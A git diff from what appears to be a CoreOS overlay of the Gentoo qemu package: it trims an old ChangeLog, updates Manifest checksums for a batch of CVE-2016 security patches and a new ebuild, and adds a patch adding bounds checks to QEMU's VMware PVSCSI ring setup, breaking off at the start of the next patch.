-*qemu-0.8.0 (23 Dec 2005) - - 23 Dec 2005; Luca Barbato +qemu-0.8.0.ebuild: - New version - - 05 Dec 2005; qemu-0.7.0.ebuild, qemu-0.7.0-r1.ebuild, - qemu-0.7.1.ebuild: - Make amd64 keywords match qemu-softmmu - -*qemu-0.7.2 (11 Sep 2005) - - 11 Sep 2005; Luca Barbato +qemu-0.7.2.ebuild: - New release - -*qemu-0.7.1 (25 Jul 2005) - - 25 Jul 2005; Luca Barbato +qemu-0.7.1.ebuild: - New version - -*qemu-0.7.0-r1 (18 Jun 2005) - - 18 Jun 2005; Luca Barbato +qemu-0.7.0-r1.ebuild: - Meta ebuild added - - 25 May 2005; Luca Barbato - +files/qemu-0.7.0-errno.patch, qemu-0.7.0.ebuild: - Fix for the errno issues in helper2.c - - 18 May 2005; Luca Barbato qemu-0.7.0.ebuild: - Add a notice about the qemu group, thanks to Leung Ki Chi - for pointing the issue out - - 12 May 2005; Luca Barbato qemu-0.7.0.ebuild: - Hardened updates from Kevin F. Quinn - - 07 May 2005; Luca Barbato qemu-0.7.0.ebuild: - Some fixes here and there, thanks to Sok Ann Yap - - 29 Apr 2005; Luca Barbato qemu-0.7.0.ebuild: - Retouches and corrections, thanks to genstef as usual - - 29 Apr 2005; Luca Barbato qemu-0.7.0.ebuild: - Added udev support and qemu group creation - -*qemu-0.7.0 (28 Apr 2005) - - 28 Apr 2005; Luca Barbato +files/kqemu-sysfs.patch, - +qemu-0.7.0.ebuild: - New version - - 18 Dec 2004; Simon Stelling qemu-0.6.1-r1.ebuild: - added ~amd64 - - 28 Nov 2004; Luca Barbato qemu-0.6.1-r1.ebuild: - Missing dep added, thanks to Frank Groeneveld - - 28 Nov 2004; Luca Barbato - files/qemu-0.6.1-20041126.patch: - Minor fix, the patch had an Header reference that cvs replaced - -*qemu-0.6.1-r1 (28 Nov 2004) - - 28 Nov 2004; Luca Barbato - +files/qemu-0.6.1-20041126.patch, +qemu-0.6.1-r1.ebuild: - updated qemu to the 20041126 cvs snapshot, this should fix bug #72561 - - 26 Nov 2004; Luca Barbato - -files/qemu-0.5.4-jocelyn-mayer-ppc.patch, -qemu-0.5.1.ebuild, - -qemu-0.5.2.ebuild, -qemu-0.5.3.ebuild, -qemu-0.5.4.ebuild, - -qemu-0.5.5-r1.ebuild, -qemu-0.5.5.ebuild: - Cleanup - - 17 Nov 2004; Luca Barbato qemu-0.6.1.ebuild: - Removed qemu-fast since that feature won't build on most systems - - 16 Nov 2004; Luca Barbato qemu-0.6.1.ebuild: - Stray useflag removed - -*qemu-0.6.1 (15 Nov 2004) - - 15 Nov 2004; Luca Barbato +qemu-0.6.1.ebuild: - New version, filtering qemu-fast on nptl - - 02 Nov 2004; Luca Barbato qemu-0.6.0.ebuild: - Minor fix - - 01 Nov 2004; Luca Barbato - +files/qemu-0.6.0-configure.patch, qemu-0.6.0.ebuild: - Minor fixes, some taken from Andrew Kirilenko from bug #69384 - - 28 Oct 2004; Luca Barbato qemu-0.6.0.ebuild: - Marked ppc, added some ewarn in the postinst as requested in bug #69206 - - 25 Sep 2004; Hanno Boeck +files/qemu_gcc34.patch.gz, - qemu-0.6.0.ebuild: - Fix for gcc 3.4. - - 20 Aug 2004; Luca Barbato - +files/qemu-0.6.0-sigaction.patch, qemu-0.6.0.ebuild: - Remove ancient glibc workaround - -*qemu-0.6.0 (13 Jul 2004) - - 13 Jul 2004; Luca Barbato +files/qemu-0.6.0-typo.patch, - +qemu-0.6.0.ebuild: - New version - -*qemu-0.5.5-r1 (02 Jul 2004) - - 02 Jul 2004; Luca Barbato +qemu-0.5.5-r1.ebuild: - Minor change - - 04 Jun 2004; Michael Sterrett qemu-0.5.1.ebuild, - qemu-0.5.2.ebuild, qemu-0.5.3.ebuild, qemu-0.5.4.ebuild, qemu-0.5.5.ebuild: - pkg_postinstall -> pkg_postinst - - 17 May 2004; Luca Barbato qemu-0.5.5.ebuild: - Put the qemu-fast target modal - -*qemu-0.5.5 (09 May 2004) - - 09 May 2004; Luca Barbato +qemu-0.5.5.ebuild: - New version - -*qemu-0.5.4 (28 Apr 2004) - - 28 Apr 2004; Luca Barbato - +files/qemu-0.5.4-jocelyn-mayer-ppc.patch, +qemu-0.5.4.ebuild: - New version - - 27 Apr 2004; Luca Barbato qemu-0.5.3.ebuild: - Removed the softmmu target - -*qemu-0.5.3 (24 Apr 2004) - - 24 Apr 2004; Luca Barbato : - New version - - 15 Mar 2004; Chuck Short qemu-0.5.2.ebuild: - Marked stable for x86. - -*qemu-0.5.2 (28 Jan 2004) - - 28 Jan 2004; Chuck Short qemu-0.5.1.ebuild, qemu-0.5.2.ebuild: - Ebuild clean ups and new version. - - 28 Jan 2004; Chuck Short qemu-0.5.1.ebuild: - Marked stable for x86. - -*qemu-0.5.1 (03 Jan 2004) - - 03 Jan 2004; Chuck Short qemu-0.5.1.ebuild: - Initial version, ebuild submitted by Jocelyn Mayer - Ebuild modified by me. Closes #37047. diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/Manifest b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/Manifest index c3220a4c2f..5cf9e84790 100644 --- a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/Manifest +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/Manifest @@ -3,10 +3,37 @@ AUX bridge.conf 454 SHA256 a51850dd39923f3482e4c575b48ad9fef9c9ebb2f2176225da399 AUX qemu-2.5.0-cflags.patch 410 SHA256 17f5624dd733f5c80e733cc67ae36a736169ec066024dbf802b416accfed0755 SHA512 0194d28de08b4e51c5bd1c9a2cc7965ba7f66dfddb8fd91de3da93677e6cf2d38ad3270f69aaea8a20cf2533c2980018d6e0fed711be2806fe2053fba7c081f3 WHIRLPOOL 5f5b95d00409fbe03adb64801d30a2fb5f98dded5efa7f0e78b5746776f72917dcbea767e1d0afcb304d8bf8c484adedb8037e6d54e9d34997c2bc3a98b53154 AUX qemu-2.5.0-sysmacros.patch 333 SHA256 a5716fc02da383d455f5cbd76f49e4ee74d84c2d5703319adcbeb145d04875f9 SHA512 329632c5bff846ca3ffcdb4bc94ae62f17c6bdbb566f9bec0784357c943523e8ca7773790b83a9617734cab3b003baa3d636cbd08f7385810a63b0fa0383c4f0 WHIRLPOOL 2a774767d4685545d3ed18e4f5dece99a9007597d73c56197652ff24083550f987ffb69e5c624760dece87def71a7c5c22a694bf999d7309e48ef622f18f0d73 AUX qemu-2.7.0-CVE-2016-6836.patch 889 SHA256 a94812131e8baa66b81971579ab84b20bf15d544e2698448a5247ac0ddca0b3d SHA512 cf7f327f26aee5b6688eb662ced8aa07775ad9558b4a02db244303f6b7d37be9cd19b18d5725819b4708184105b98830864e0ad3af81373e59e880809036345b WHIRLPOOL df00627ad447162fdcac4b2c965a8cb5c916a7fb66d8c3a4f8f48bb2d869d7805cb3308cd495ff74ebf4840e7bc2d85abf8e666d78b3da9abb4e2bae22697a82 +AUX qemu-2.7.0-CVE-2016-7155.patch 2745 SHA256 addf638a53bfae8556e463e0b78a151eef0fdf171eb395a98dbdf0332ff74131 SHA512 96e9df733c5227899da7d2ecc346139df9830dd16fc16f1f14666f8be60205a43f434fd79e158c2000926656ffa137809f1cb3c57a04cb375011f816e92e2f4b WHIRLPOOL c04c0dda417a70e4acb289c6b296da93f3eb8e51f7cfad62351b7235512e04714fdc169a87f4cbf1ef82bfc6decc8ebb5b3958f23d001795c9ebcd08369185a3 +AUX qemu-2.7.0-CVE-2016-7156.patch 2314 SHA256 7fa0d7f1025a3435b692a6e7ed8fa3be38a918395a8253e8c27f416ff37e041d SHA512 db3009fdf6d85ffd24fd4a2a40b372b0e665274bba1ce01632aef0d583f2830b58f889166a34acd36409944ab3f7e264801bf89a78f55a586b5f43429a1c86dc WHIRLPOOL ce8101b7607612ed7b9c6fbe373f9b5dec07e0ea8af0b4be8e52b4add5dd0ba12c9e5eb7380d68e3d3867988e0cfc1bdd1e8357ce2b71ef19f51e316fac62161 +AUX qemu-2.7.0-CVE-2016-7157-1.patch 888 SHA256 7a1f6199b16c220df51002e1222763d1a7c7b3a08349f664e576a9facc553516 SHA512 5c104464dfa48804d94ccca9a9d881f9e22eba2c3d9a2cbf3a645c3a696e89ea3f4603ea28deba9a1cd800df9bc5ad4894606869eca3e1e9cf95414723846938 WHIRLPOOL af42ec7ca93c92c4df060b4efd61bcc3f7cb5582d00bfe174d81f2393ad3a7f06e27cc2b2186f664860c3ee98f76dd68cd7e6de7ff7e63b778f345c32a62b495 +AUX qemu-2.7.0-CVE-2016-7157-2.patch 812 SHA256 1db3b565b4762abbc1096286c9887400591af76bf422a105e457c6bdcb887b59 SHA512 8d2177adc638d384302ec89de65a0acd4f4069580c40d6c50cb78501f25f4d171f3b92a36464711337e07dbf208f9ad93eb2f86a7361dde52026c1764341e10d WHIRLPOOL e815e165bb23cd42aaba2310e3fa48bba33b0344069e6f54c4b26dddad746516053221969fad855d6c827d42371494c609123b002e1e2a96c366d11131b3243a +AUX qemu-2.7.0-CVE-2016-7170.patch 1527 SHA256 37d600b5a4ba143f1d6b26acbcf23357fa41a5f852774f68b6b6736a6ecec024 SHA512 c84494ec4ee9607cef7b230a25d10de444a29fecba57566df5394d40b88596ef91fbd5edfb51a58c5ecff7fa7ef39b7d32ba7976dbd011fb1b29a2e46e4e0080 WHIRLPOOL ddd3d94da447556b24257c11068bef360da6cf35e22257869b09057f42ba027636e605db96d9a66253f423f5667814a1f8c551f8eece733fd997b03d6ac81e2b +AUX qemu-2.7.0-CVE-2016-7421.patch 1183 SHA256 f3996d9d4658fb32a04ce8ae3d3510e6a51a0aa39f64b003a636f68dacef19db SHA512 51d07015e27e4dfbde2c3ffa37d91134374b49c136735845c34155238767483ede8bbc7232ea93b4e4cbcc28195cbe1986d44ac0dd96e914ec29df3a1da9dfcc WHIRLPOOL a4e27d329591b2a3b94a7abed81df1f87509f5a38beb490d7a4ca7c14df2a864f4126c26fc044bb4357467b0f9ed0ca5811d5e85812e318adcb3236c30bef7a1 +AUX qemu-2.7.0-CVE-2016-7422.patch 1125 SHA256 7a3d31031b8ea70be29715e8d384f47ad8758e81b9cfc3768e59dd6c6a00cb2a SHA512 6a08f661cd2b00214297570c8035042544b0e707b2f20f6c59c251a73971f2b7e1920c7242ca09a4684ea58dcb177d11d087ee5e0523792e3c446e70239498ef WHIRLPOOL 82b38aa12e49695c1f0c67c303039afb05cc314d14e5bc8286bafebfbabd3eb3cddd41338d45f9510ea2f5074fd9028b39c251be0e5856e0221232a8b28797a9 +AUX qemu-2.7.0-CVE-2016-7423.patch 925 SHA256 2b9b1102c3c9c54ba2c311661c3222b1df246a519e9eef57d0793951c1249ae0 SHA512 e4401163d15f9ebd9057b8ddf4187f7a0a2f379cb8aea2bd92b20f132f7714a4e386733884be4568eddbd4067b6cad80275ccc101276897c4796117a9b20144f WHIRLPOOL 9bd9f5ed067604f065d3ac7447f8135dd72e178caa6f3c5a5ca7bc531a8008ec46620c4af33bea54a35dfe52e430d48dcf5b59145c4e1efc2a14cb789e38f5bd +AUX qemu-2.7.0-CVE-2016-7466.patch 830 SHA256 5664c091038185766a54b93495029bbf6de116e8752c2334fa1c71b8387e89c3 SHA512 d158b1f66766f33b1df561956cc3c77d40e1422e44791cfc753d3def2f1851c2c9c0aeb299bcd1ae969dde8f4249f4489ed90776ebb497db4f626217710e4f48 WHIRLPOOL 13112769ecd6420e17d2a3c0e110a2bd479fc09d8a2086d27f0703a4d6c35ded07e003f28ff14579655c5468cd02c77fa514ba7ed6543f61deb60c6de604c99b +AUX qemu-2.7.0-CVE-2016-7907.patch 1380 SHA256 58aa0af82a88de8967452c06ec229de381494e7ac222273ac5a7aa2c53dc5529 SHA512 5a311dea9554d7225d75fb2c680d2f7a2b151b46802176424f495e792ab4a9a101ad99099ccf2b6250230f23fc1ea804381129cd34eb0e4cd24c1e2442de9b51 WHIRLPOOL 69e7e01bc0b221581a8b1ef1af23eb59a6ad87acbfe821ccf8c23f349c9e31b84e4b8db83f48a849a4c5e9b6229f8d55e671da9f8485ecbc24855a8ab50b02ec +AUX qemu-2.7.0-CVE-2016-7908.patch 1718 SHA256 3042b5425964c9bdb6ebc17d8f4bc5efd150547a348269d54e0962efc6a658d4 SHA512 441aa4fe46a2d6d425b1759ebadabc12fb1902f80364d351120932a13b9a46030bd2ad8c7faa57d6bcfbf740d9af2a96cec082a0d40b9a7469499ba1f19177bd WHIRLPOOL 6d870c28645e6fcb12e55a4da5f9dffae78d1fcd013ae6fd9727ae46e05103dc8870d548117e7f396af79cf76947ee8d0b5285ec9b4c6aac840aa6d1e1fc9054 +AUX qemu-2.7.0-CVE-2016-7909.patch 975 SHA256 8fb9a27f56c6875f271ac0dc80fd78af8b70d40778ef967019e4a1b0a47ff1ae SHA512 e2793eb18179a7c7276c4d437ea68bb02a6a3963842dd74041fdf3c9f239d6353c7d9e5705c1342fc01b5c7e3bc1bfb882d8094fbe4144ac5f705852579139ca WHIRLPOOL b73aef899c94c9130385dd757b25783b20fce9d32faa245847353766e046bd769789d8b107ef06c726a0e2471a5ef1599716343782c8a82267b79ca53c281414 +AUX qemu-2.7.0-CVE-2016-7994-1.patch 835 SHA256 6b84d2273197bd441761469245991d02b5de8b70c29abf096df301e87b5c2478 SHA512 7a8c1c6ffc654f428485057a31d40a831707e5e6a84e32f722f6fc4c86ed474dcd19bfc8034b3a603362d821e7170f46e25ddc2ca50b60f00f45455241ba9464 WHIRLPOOL 80c5c51535cec848664811d8cf41db9d931e3215522fcaa404fa55f0c3b821bac346129b254b60a72cc09493366d8499882874dcb797e8a81e39157f64539b73 +AUX qemu-2.7.0-CVE-2016-7994-2.patch 896 SHA256 c23fdfb127f60d24c4b56e7745463f5655ace7af9f5fa392544e7ce05a564c5d SHA512 4243d04a573ccee043911645e716a9c6f7e28858163b48ea58e7a9734d817ac9237c4866fce843dbe10fa996cdd5453f3b704509ff4761f2ec4531d9355cc7ce WHIRLPOOL c5f7b605f566f94ad170c4819c378f9a1e3ae2740130000d9bea4c741f29365a1b5a1f1d495646e866c39a18d7da1236d731861005099457e09bead9fffa8105 +AUX qemu-2.7.0-CVE-2016-8576.patch 2092 SHA256 dbe3ee6778cdd802fbd7d7cb2aa991cc73e6be160bad90f2e40de02ab820a865 SHA512 25daaa79f4cb355c5dce639a14c2e265142a0c83bdbc813816789f37e293846f3768f08b9f04f692ce5b8719dadd2dbedb75f314a3f441a70e0789ecc88eb8de WHIRLPOOL 25fc67d9dc8e8d8345778b46b16f9f7c5d6da39ebefea60ef81b20e4685014a019d4c39a6619dbf48411800ae9e9c383a7243fb055ea1f2bd0b2cb7e1a2c8d4e +AUX qemu-2.7.0-CVE-2016-8577.patch 1020 SHA256 fbe7b6183f019ed6c8c6afeeed4854c23991d3f18501e8f3403df8812cefd420 SHA512 364434deb120856a114a94aaab2edbaf9e5f9246e6393f584949a6b706dbdc5b711f459a48e3825554e2fa9595a1aa78fee3711cfeba3b94219b4f47e269b2de WHIRLPOOL 561f7bd41f0ac439808070757cdff9f69f6a378fe6610269c32d600575ed60b22919f4d3ea08f621648dbf3e5e97290737005e9df5949bdeeba9319901cf427e +AUX qemu-2.7.0-CVE-2016-8578.patch 2208 SHA256 9b0e7852aefeb3950de38babec7a30f3225342670a72160829baa5e50786bdef SHA512 326ec2112b1cbaa4b4ddcacc02f4accd5b73e78db07e93b229d891f4cbc8d5a2db82c727d920613abd1668402ffeb16a223d8271db569435966aaece271da875 WHIRLPOOL 88ca80aa1883813f1ec9c0802e830f719317130de6959df393188e4e82764125868baec038a1dac94eab33851706838d245b205edcbf8e1864ceb83257648b99 +AUX qemu-2.7.0-CVE-2016-8668.patch 1124 SHA256 26f16376a73bdf9052039d1bd90545b75cc8fb0a89e0bffbf5881b537319b759 SHA512 de4df82297d199cadafefd57bc895cdf21c5acb0e0a6223212272991b652c302475d8662fb013d6a3e949d2e57a14a0ac6d861f486de8b5130fd84d66957c899 WHIRLPOOL 3995164f25accfd5c837c85fbb590acd0b7effb08370a7d4c0cb03c042ee03b2b10ca9892bd50251d17a1ba2ffff1e7a04e918f4d4e1c85406df95a6802c03c2 +AUX qemu-2.7.0-CVE-2016-8669-1.patch 911 SHA256 ad841a34490a02123df31aef5a0b9d31912eec8465e0c5da7cf73dc880ffd8f4 SHA512 23a26716ea554d9af73afb08d3a3d1e668e23bc0710508196039454dfccbe3764feda63d901a9c053c52af92cd069f5a4f078efdc9924f6d3cfe6a21f9d287de WHIRLPOOL 412d7a4be19defa4a098fad6a66cadd7eca9cb5971828636dfd20a57b3eef09f3801660dbf507ac1ef0fa82f9f01583e9c5e2b1e45c016adb535cd951ff16eff +AUX qemu-2.7.0-CVE-2016-8669-2.patch 1037 SHA256 176a35f5191023ad665cb4019663618d48948b174b16888776245d1a001ec186 SHA512 82a71c9566f37aceffbbaa45547bc686c028353a1845bd63e49550e71201921bc2fb9793077fc1fc74d77417da84dae71e0862243acbb3d900db258a343b8ede WHIRLPOOL f489c52bf2ca6e434695a5ca12af64a83e6534536c07b02c54f82c72e59e3f026e6a9fd9cec5eb62e2cf8d009f878ac1015f58d9f5ba725a03e1e194c4abc96c +AUX qemu-2.7.0-CVE-2016-8909.patch 980 SHA256 989210bfac97091e67fbe973be7a6d8aa0e6411069904a07f7c57c67e8539bb8 SHA512 23a1cfa4f257e598152d92e11d94e88c52b3702aa585fba3a71340ee16dfbd29234d6e5c81613ea71b64cead8dcdbb536246096b1c374290aa39871daacb25af WHIRLPOOL 9909ed14f5fa4a1d2ea0f8bb13f5a0e08e2f7888078e1f5b4cfaf381ccabeac22c998c9785efee6a307dbeed45801d8354650c18c6920bfb13da030127d9da7e +AUX qemu-2.7.0-CVE-2016-8910.patch 848 SHA256 919e566e98434486f89ecfc3158ccee59c5bbdf3848b2a668136901871f5f1ab SHA512 1f695ebc2f10b2cda5a9b93c097adb49858af94817c14a406c7d26edd42353c776b0afc4779bc1c6f930dadcf450906924f8080ca5c87eb7c7e6b5694464dc7e WHIRLPOOL 574900ab3eca13429769c7e2b56fd4e4b1220800b2e5bc933eef502c633614eab22cba6af4fdd1fd55e3a7e70d3d5ead1cb1970f8211b5f4fc43e3d782865f1b +AUX qemu-2.7.0-CVE-2016-9102.patch 739 SHA256 ae425fbbaf6dedcf6eabe3d1f0bd300be70550f7bd77290536617372eed96766 SHA512 dbf40c7f0a055d10fbb5d02b21e8c3f62dc9bb2718639eb3dec007ba610aa0a045c1a449a7b3aa02a21056807a25d6e523eb782d79b2a249df1258af1dadefad WHIRLPOOL 89ea3815b9d744a98ff49df65a514a20966c7ada508e33dbc73704d60c75c48f6f544bf658180a2b73ca612bcc62e2e146b0efdbbc51456ba81518c5b28c80dc +AUX qemu-2.7.0-CVE-2016-9103.patch 1002 SHA256 009696b3403c0481223fac6bc93976fc85727eeb0716a9e19545e8ac4da95e8d SHA512 0f47c2d13cbda36a7796773150865001060e4b530d76ca6b0c46d1041108a57830939b0dc7cdc960ccc705bcd463dd57505d748edf36610d7de2af2560e62597 WHIRLPOOL 8d4cb500025f59075a1038cefe0c8ccd063282527b35873cdd9d29ba58cdaa3fc285d5191657ecdef2b056a017f89d8f66f4a544f201e5952426d6dd619b23ba +AUX qemu-2.7.0-CVE-2016-9104.patch 2890 SHA256 7ba38b43519eb8f9c8c70daaa1705c01a331cbb98b4d4f8eeed31da207f3a13b SHA512 7f6d84f12e8372b72fe4db8e47064ecc7ea0698bb7c5dc0285316354461edb35e01ba76a6e16c1bf7e03d5f0070822f4bb61655e44af5536ee81970b4ff937e0 WHIRLPOOL 3f8e973cf28040422d25394b14f3b99894796b64408a3c15957d628d74076bc1e577ea2e2803e428d85b94607c74f81d23219d9487aa0085a80a2e89d78a5829 +AUX qemu-2.7.0-CVE-2016-9105.patch 610 SHA256 f4303796ece1e46f6e622e8cd0c9029daa0a6ed29ef630a0c64a5c595dbeb1b3 SHA512 1ab19ef861b6fe55017d02b7cbf24ad60776ed64e052d6e1b670c9aac7e312207718fcf601e9dba4bdd2c9104b9be25bcf0055b42e080b1f8abf9bc3f7db0b36 WHIRLPOOL 07fe76de2d2d68bcd091e90cc9578b17d5a8ad12ab316683d6e4badea443d08e08060a4e206f555c88b60b0a45f4ba49c9d11f42ee44b5b43200843c37329dad +AUX qemu-2.7.0-CVE-2016-9106.patch 835 SHA256 594213b4200ae109dfbc6ec8e536d275d798c756a25e130a86972c514730f541 SHA512 6a3249f47fecdbe28eec496eb1284296d04d9e75efab21ab226d6ef2d5254bd85a44aa08879b1922682b65b5bce2e699ccaafa3a2b8b6f60ccbc84432bc599cd WHIRLPOOL b80c2787cbe71f416a7ea2aa39e800922b0a8a410eacb038d0163dfbb91f6a41cc2ae5afb010a7395ef17207e6b1acda34cddd9ff9d1ab035330ade6334e8b8c AUX qemu-binfmt.initd-r1 7966 SHA256 5b4b432aa1e44f387c9eb789de0ec6322741fd36dd241f76520f17c6cd6ac49b SHA512 2ba0bff6eb2b6bac4ed440f793771ce9551cad48e38bddb6cf04f804faac2407e80879f66771910344ddcea45f0014095dcc8bfeb0aad5085ef048fd3612dbd8 WHIRLPOOL a2a1fb830a970757d1e203378c7d382b161b1040f3b8aaf0f22bb3b5e46467eff395474ff40d93c9f133bab307b345a6f75d63eae9f8dd8daf67324db41032f9 DIST qemu-2.7.0.tar.bz2 26867760 SHA256 326e739506ba690daf69fc17bd3913a6c313d9928d743bd8eddb82f403f81e53 SHA512 654acaa7b3724a288e5d7e2a26ab780d9c9ed9f647fba00a906cbaffbe9d58fd666f2d962514aa2c5b391b4c53811ac3170d2eb51727f090bd19dfe45ca9a9db WHIRLPOOL dcb3e5f7da89dd8e14d636d7ebd476e076e0043880bb9ea3fb1c03cb4bcd4e5c7d3c4719da26c3ce521e3a3db5ae671e86f198ac1bc3474e774d75504fef8b8d -EBUILD qemu-2.7.0.ebuild 20516 SHA256 987648bd2fd0f1ebf45493698ec2b9ed2e16d6abb38fd48eb793ef3b6d55c55b SHA512 bf0cd8fa256036002771d3e5476970d50ffc6b86c8b6a9b5a0048c4ac992b816fb5585d2fd1485b3adda3a55737b32e8e1f07bcea4200d3bac0a9ac98840e181 WHIRLPOOL 3f9b559d60a933339a52de83004632bdfc8c45285013cef86a5f99fe580eafa7443ea5cae9399b54865bb05bc1007492575f98ac109b2a17d37d10d44d8874bf -EBUILD qemu-9999.ebuild 20465 SHA256 0722782a27bbb312bc9bede6a556fd6f086e6c056cb4b8b197e3ec8c10801945 SHA512 3f5130a9cffb1cdf7460693e777c82ec289649ba74367417f1a865f7231a976de234b2be5c2882eeb358d1aecb2e59f3ddf8bd28a66be17bea4ef58b122564ae WHIRLPOOL a009c51c5f08c6e9ee89467b47eef435fd68b97c3e253a300662cf476f119ad4c96911040a72570d1f2aef3d44128b0c5544008918764430e0f9f0dde94b16ad -MISC ChangeLog 28480 SHA256 20cb806ded220afccc77c70ce040291665a4325b627cdc0f975f66919006aedb SHA512 93aa1616116d1d5e0456e14c86773373a65febd9128e72400ffeb7db5ee4721ceba0dc53607d86435049cbd910846b4197f2b15b00f39de601efaa6c90d8b9f3 WHIRLPOOL a54f9b7c1260a190174240edae87e47b7b9f39a51e8f1d03917748b2ea82e2e0721fb142cc7b33ce54e285deb8e4ba3fc483ab0c912f4ae28d3280777d9588f3 +EBUILD qemu-2.7.0-r7.ebuild 22214 SHA256 a7f8b5889bfc48862dc7bf1868c3edaf71c1dc234dc8a42b95cb5b223b028151 SHA512 4314c6d3fc6c627e0cb2795f764f739eb353e9cbad709bf2be352d1c0022842cab18bed315169dc7fb6b95018087b173b930074345c5113bd7a012cda66f10cc WHIRLPOOL 14616e86ea4b102c30af58d3ecb5834586c051a1a58778e6cb5fc08f79d9b5fbde2579d6e49e7a464d4906b4e3019b518f405b21c4b413de0cff83ab5050be43 +EBUILD qemu-9999.ebuild 20472 SHA256 5802d28fbfc1d398a154b4ef3d62e74bfe5166401d2b56c0c62f481a8bec4ef3 SHA512 96a34de1ce3fe58a16add1549e2c6233f8ffcc63f2b38dcfca9d941d147e3f9ff10dc0bfc9e4c92fbe3a108b23f59171d6cd311e5d99229f020198d0493a4b38 WHIRLPOOL cc4bdd1a001ab106e6ffb39612c7cabdca9faf8e7aceb07942c0f0440cf71cdb8bf96c23d71773d6e5d3e11234c1811c22f22f613fff5781c072e955a0a32f29 +MISC ChangeLog 34977 SHA256 48c9a111a9eac22d5aef983a5c98fd2ce37cbb2df943a32638287d3a7477c6da SHA512 4a97d97960ad4accde6b48764a380160484427db586ded5d1699327a89e412760d9e7ed81a185f6900afed171f0023dd4c34dfc2148d98ff222e0c24c2af1649 WHIRLPOOL 75bd0f8453a37ad223f11f28971f195a54e003e973b6e44aa48f4b9b2532bb3dd39f35655c239d7b3b7a6fc0c4ff719ae5abab652b92da6664cd8bee523ef047 MISC ChangeLog-2015 58193 SHA256 60c1a4f4c85515520ab14da920bbbf4a6813491ce16b5357a0456ea588815a5c SHA512 ddfe8e75aabe59b731a4a8b31839d8c71fd516620306d2bc99d7641cc501652974e053104caafa7550c5ad33b6834295f6743a98b9419d292b8bf6f67918ccd3 WHIRLPOOL a6841f79c3ba1cbf76a8c7fde296a2912c46ddd251494dca3bf3bc13391c80595b6f80125c383823899942248008ede7065b0f5c8e43f9bc1d0464aa62cc187f MISC metadata.xml 3925 SHA256 d1c219b7da0cbf77919cd1e055acbb3f6788a574fd802c98a43c89a411697b36 SHA512 3ff45d1c8ede12b4eedc7d01f39777b76a1cbd0ba9364299dec99d4b4a05cade5784d6f6e50197d5b5ae1f1b8e831c49da195eb53263c49b7d16aec8ee28b6e6 WHIRLPOOL bc25783fac0f3f13318834cc535404af9af20de16c7aeec222e59dc2ed7740ac5e767b329a5bcd6356d0cbae2428e278515f1446aa8ecb87a873bf4dbe04bf41 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7155.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7155.patch new file mode 100644 index 0000000000..495faf2f1c --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7155.patch @@ -0,0 +1,81 @@ +From: Prasad J Pandit + +Vmware Paravirtual SCSI emulation uses command descriptors to +process SCSI commands. These descriptors come with their ring +buffers. A guest could set the page count for these rings to +an arbitrary value, leading to infinite loop or OOB access. +Add check to avoid it. + +Reported-by: Tom Victor +Reported-by: Li Qiang +Signed-off-by: Prasad J Pandit +--- + hw/scsi/vmw_pvscsi.c | 21 ++++++++++----------- + 1 file changed, 10 insertions(+), 11 deletions(-) + +Update per review + -> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg00019.html + +diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c +index 5116f4a..4245c15 100644 +--- a/hw/scsi/vmw_pvscsi.c ++++ b/hw/scsi/vmw_pvscsi.c +@@ -152,7 +152,7 @@ pvscsi_log2(uint32_t input) + return log; + } + +-static int ++static void + pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri) + { + int i; +@@ -160,10 +160,6 @@ pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri) + uint32_t req_ring_size, cmp_ring_size; + m->rs_pa = ri->ringsStatePPN << VMW_PAGE_SHIFT; + +- if ((ri->reqRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES) +- || (ri->cmpRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES)) { +- return -1; +- } + req_ring_size = ri->reqRingNumPages * PVSCSI_MAX_NUM_REQ_ENTRIES_PER_PAGE; + cmp_ring_size = ri->cmpRingNumPages * PVSCSI_MAX_NUM_CMP_ENTRIES_PER_PAGE; + txr_len_log2 = pvscsi_log2(req_ring_size - 1); +@@ -195,8 +191,6 @@ pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri) + + /* Flush ring state page changes */ + smp_wmb(); +- +- return 0; + } + + static int +@@ -746,7 +740,7 @@ pvscsi_dbg_dump_tx_rings_config(PVSCSICmdDescSetupRings *rc) + + trace_pvscsi_tx_rings_num_pages("Confirm Ring", rc->cmpRingNumPages); + for (i = 0; i < rc->cmpRingNumPages; i++) { +- trace_pvscsi_tx_rings_ppn("Confirm Ring", rc->reqRingPPNs[i]); ++ trace_pvscsi_tx_rings_ppn("Confirm Ring", rc->cmpRingPPNs[i]); + } + } + +@@ -779,10 +773,15 @@ pvscsi_on_cmd_setup_rings(PVSCSIState *s) + + trace_pvscsi_on_cmd_arrived("PVSCSI_CMD_SETUP_RINGS"); + ++ if (!rc->reqRingNumPages ++ || rc->reqRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES ++ || !rc->cmpRingNumPages ++ || rc->cmpRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES) { ++ return PVSCSI_COMMAND_PROCESSING_FAILED; ++ } ++ + pvscsi_dbg_dump_tx_rings_config(rc); +- if (pvscsi_ring_init_data(&s->rings, rc) < 0) { +- return PVSCSI_COMMAND_PROCESSING_FAILED; +- } ++ pvscsi_ring_init_data(&s->rings, rc); + + s->rings_info_valid = TRUE; + return PVSCSI_COMMAND_PROCESSING_SUCCEEDED; +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7156.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7156.patch new file mode 100644 index 0000000000..9c21a6759a --- /dev/null +++ 